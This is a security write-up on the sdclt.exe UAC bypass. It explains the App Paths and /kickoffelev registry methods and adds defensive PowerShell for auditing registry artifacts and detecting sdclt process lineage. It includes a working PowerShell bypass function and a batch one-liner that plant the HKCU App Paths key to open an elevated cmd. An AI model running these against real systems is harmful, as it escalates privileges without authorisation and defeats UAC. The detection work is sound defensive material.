sdclt.exe is a Microsoft binary that ships with Windows (Windows 7 and above) and lets the user perform backup and restore operations. However, it is one of the Microsoft binaries whose manifest sets autoElevate to “true”. This can be verified with the Sigcheck tool from Sysinternals by inspecting the binary's manifest:

sdclt – autoelevate is set to true

Matt Nelson discovered two methods that allow a user to bypass UAC through this binary in Windows 10 environments. Both methods require constructing a specific registry structure, but they differ in what that structure holds: one method takes a command line with parameters, while the other takes the full path of a binary that will be executed.

App Paths

The backup and restore operation is part of the Control Panel. This means that when the sdclt.exe process starts, the Control Panel starts as well. This binary is designed to run as a high integrity process:

sdclt – Control Panel starts as High Integrity Process

Also, when sdclt starts it looks for the following location in the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe

However, this location doesn’t exist by default, so an attacker can create it in order to execute a payload as a high integrity process, bypassing User Account Control. Because the key lives under HKCU, which the user’s own account can write to, no elevated rights are needed to create it.

sdclt – Registry Location Doesn’t Exist
App Paths – UAC Bypass Registry

The next time sdclt.exe runs, an elevated command prompt will open:

sdclt – Elevated Command Prompt


There is another method which can be used to bypass User Account Control through sdclt, and it takes command parameters instead of a binary’s full path. Specifically, when sdclt is executed with the /kickoffelev parameter, it performs a check in the registry in order to find the following path:


By default this path doesn’t exist, so it can be constructed manually to execute a command prompt:

sdclt Fileless UAC – Isolated Command Registry

When sdclt is executed again with the /kickoffelev parameter it will find the IsolatedCommand registry key and an elevated command prompt will open.

sdclt Fileless – Elevated Command Prompt
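The two registry locations described above are the artifacts a defender can audit for, since neither exists on a clean system. The following PowerShell function is an added example written for this page; it is not code from the pentestlab post or from Matt Nelson’s scripts. It assumes an elevated PowerShell session so that every loaded user hive under HKEY_USERS is readable. The App Paths\control.exe location comes from the text above; the exefile\shell\runas\command\IsolatedCommand location is the one used by the “Fileless” /kickoffelev method in Matt Nelson’s write-up, which this page references but does not quote.

```powershell
# Added example for this page (not code from the pentestlab post or from Matt Nelson's scripts).
# Audits every loaded user hive for the registry artifacts the sdclt bypass relies on.
# Assumptions: run from an elevated PowerShell session so that all hives under HKEY_USERS
# are readable. The App Paths location is from the text above; the IsolatedCommand location
# is the one used by the "Fileless" /kickoffelev method in Matt Nelson's write-up.

function Get-SdcltBypassArtifact {
    [CmdletBinding()]
    param(
        # Delete what is found instead of only reporting it
        [switch]$Remediate
    )

    # Locations sdclt.exe consults, relative to a user's hive. Neither exists by default.
    # HKCU\Software\Classes is really the per-user UsrClass.dat hive, which is mounted
    # as HKEY_USERS\<SID>_Classes, hence the HiveSuffix field.
    $checks = @(
        @{ Method = 'App Paths';             HiveSuffix = '';         Path = 'Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'; Value = '(default)' }
        @{ Method = 'Fileless /kickoffelev'; HiveSuffix = '_Classes'; Path = 'exefile\shell\runas\command';                                  Value = 'IsolatedCommand' }
    )

    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }

    # Real user SIDs only: skip .DEFAULT, service SIDs and the *_Classes hives themselves
    $sids = Get-ChildItem HKU:\ |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
        ForEach-Object { $_.PSChildName }

    foreach ($sid in $sids) {
        foreach ($c in $checks) {
            $key = "HKU:\$sid$($c.HiveSuffix)\$($c.Path)"
            if (-not (Test-Path -LiteralPath $key)) { continue }   # absent = expected state

            $data = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).($c.Value)

            # The App Paths\control.exe key should not exist at all; for the runas\command key
            # only the IsolatedCommand value matters, so skip it when that value is unset.
            if ($c.Value -ne '(default)' -and [string]::IsNullOrEmpty($data)) { continue }

            $removed = $false
            if ($Remediate) {
                if ($c.Value -eq '(default)') {
                    Remove-Item -LiteralPath $key -Recurse -Force
                } else {
                    Remove-ItemProperty -LiteralPath $key -Name $c.Value -Force
                }
                $removed = $true
            }

            [pscustomobject]@{
                UserSid = $sid
                Method  = $c.Method
                Key     = $key
                Value   = $c.Value
                Data    = $data
                Removed = $removed
            }
        }
    }
}

# Report only; add -Remediate to clean up what is found.
Get-SdcltBypassArtifact | Format-Table -AutoSize
```

The function walks HKEY_USERS rather than HKCU on purpose: in an elevated session HKCU is the administrator’s own hive, while the keys the bypass depends on are written into the standard user’s hive, so checking every loaded SID is what actually covers the logged-on users.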


It is possible to automate this process with the following PowerShell script, which was written for the purposes of the pentestlab blog and is actually a simplified version of Matt Nelson’s AppPathBypass script.

The code can be found below or in the GitHub Gist repository:

function SdcltUACBypass {

  Param (
    [String]$program = "C:\Windows\System32\cmd.exe" #default payload
  )

  #Create Registry Structure
  New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force
  Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force

  #Start sdclt.exe
  Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden

  #Give sdclt time to read the key and launch the payload
  Start-Sleep 3

  #Clean up the registry key
  Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
}
sdclt UAC Bypass – PowerShell Script

Matt Nelson also wrote two PowerShell scripts, one for each method, to demonstrate this bypass.

App Paths – UAC Bypass via PowerShell
Fileless UAC Bypass – sdclt – PowerShell

Command prompt and notepad will run with the same level of privileges as sdclt, which means their processes will run with the integrity level set to High, bypassing User Account Control (UAC).

sdclt – cmd and notepad as High Integrity Processes
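The observable side effect of both methods is what the screenshot shows: a High-integrity child process whose parent is sdclt.exe. The following PowerShell is an added example for this page, not code from the post or from Matt Nelson. It runs offline over constructed records shaped like Sysmon Event ID 1 (process creation) fields, and the ConvertFrom-SysmonProcessCreate helper projects live events into the same shape. The allowlist of children sdclt legitimately starts (the Control Panel binary, per the text above) is an assumption you should tune to your environment.

```powershell
# Added example for this page (not code from the pentestlab post or Matt Nelson's scripts).
# Flags the process lineage the bypass produces: a High-integrity child spawned by sdclt.exe
# that is not the Control Panel binary sdclt normally launches.
# Assumptions: field names match Sysmon Event ID 1 (Image, ParentImage, IntegrityLevel, ...);
# the sample records below are constructed, not real telemetry.

function Test-SdcltLineage {
    param(
        [Parameter(ValueFromPipeline)] [pscustomobject]$Record,
        # What sdclt.exe legitimately starts (the Control Panel applet from the text above);
        # this allowlist is an assumption, adjust it for your environment
        [string[]]$ExpectedChild = @('C:\Windows\System32\control.exe')
    )
    process {
        if ([IO.Path]::GetFileName($Record.ParentImage) -ne 'sdclt.exe') { return }
        if ($Record.IntegrityLevel -ne 'High') { return }
        if ($ExpectedChild -contains $Record.Image) { return }   # normal backup/restore flow

        [pscustomobject]@{
            Time        = $Record.UtcTime
            User        = $Record.User
            Parent      = $Record.ParentImage
            Child       = $Record.Image
            CommandLine = $Record.CommandLine
            Reason      = 'Unexpected High-integrity child of sdclt.exe'
        }
    }
}

function ConvertFrom-SysmonProcessCreate {
    # Projects a live Sysmon EID 1 event onto the fields Test-SdcltLineage reads.
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    process {
        $x = [xml]$Event.ToXml()
        $fields = @{}
        foreach ($d in $x.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        [pscustomobject]$fields
    }
}

# Constructed sample: the sdclt launch itself, the bypass child, and an unrelated Medium-integrity process.
$sample = @(
    [pscustomobject]@{ UtcTime = '2017-03-20 10:00:01'; User = 'LAB\user'; IntegrityLevel = 'High'
                       Image = 'C:\Windows\System32\sdclt.exe';   ParentImage = 'C:\Windows\explorer.exe';       CommandLine = 'sdclt.exe' }
    [pscustomobject]@{ UtcTime = '2017-03-20 10:00:02'; User = 'LAB\user'; IntegrityLevel = 'High'
                       Image = 'C:\Windows\System32\cmd.exe';     ParentImage = 'C:\Windows\System32\sdclt.exe'; CommandLine = 'cmd.exe' }
    [pscustomobject]@{ UtcTime = '2017-03-20 10:00:03'; User = 'LAB\user'; IntegrityLevel = 'Medium'
                       Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe';       CommandLine = 'notepad.exe' }
)
$sample | Test-SdcltLineage | Format-List

# Same logic over live telemetry (needs Sysmon with process-creation logging enabled):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ConvertFrom-SysmonProcessCreate | Test-SdcltLineage
```

Of the three constructed records only the cmd.exe one is reported: sdclt.exe itself is High-integrity but its parent is explorer.exe, and notepad.exe in the sample was started at Medium by the user, not by sdclt. The check keys on parent image and integrity level rather than on the child’s name because the payload path in the registry is attacker-chosen.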


This bypass is also part of the UACMe project (method 31):

sdclt – UAC Bypass via UACMe

Batch File

This bypass can also be performed via a .bat file:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f


Bypassing UAC using App Paths

“Fileless” UAC Bypass using sdclt.exe

